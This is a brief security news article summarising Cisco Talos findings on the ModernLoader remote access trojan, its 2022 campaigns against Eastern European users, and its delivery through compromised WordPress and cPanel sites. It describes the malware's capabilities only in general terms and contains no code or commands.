ModernLoader is a new remote access trojan detected by Cisco Talos researchers.
ModernLoader Campaigns in the Wild
More specifically, the researchers analyzed three separate, but related campaigns in the period March-June 2022 that delivered ModernLoader, RedLine and several cryptocurrency miners.
In these attacks, the threat actors use PowerShell, .NET, and HTA (HTML Application) and VBS files, eventually deploying malware such as SystemBC and DCRAT. The final payload of the campaigns is the said ModernLoader remote access trojan capable of harvesting system information and deploying numerous modules.
“In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian,” Cisco Talos explained.
ModernLoader provides remote access to targeted computers enabling further malicious operations such as dropping more malware, stealing information, and adding the target to a botnet. Due to the use of various off-the-shelf tools, the attack campaigns are attributed to a previously unknown threat actor, possibly of Russian origin, targeting Eastern Europe (Bulgaria, Poland, Hungary, and Russia).
This unknown threat actor is compromising vulnerable web WordPress and CPanel instances to drop the ModernLoader malware via fake Amazon gift cards. ModernLoader itself is a simple .NET remote access trojan that can collect system information, execute arbitrary commands, and download and run a file from the command-and-control server. Thanks to this capability, the threat actor can change the modules in real time.
It is also noteworthy that the threat actor “has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks.” Despite the versatile approaches and technical tactics, Cisco Talos estimates that the success of the analyzed campaigns is limited.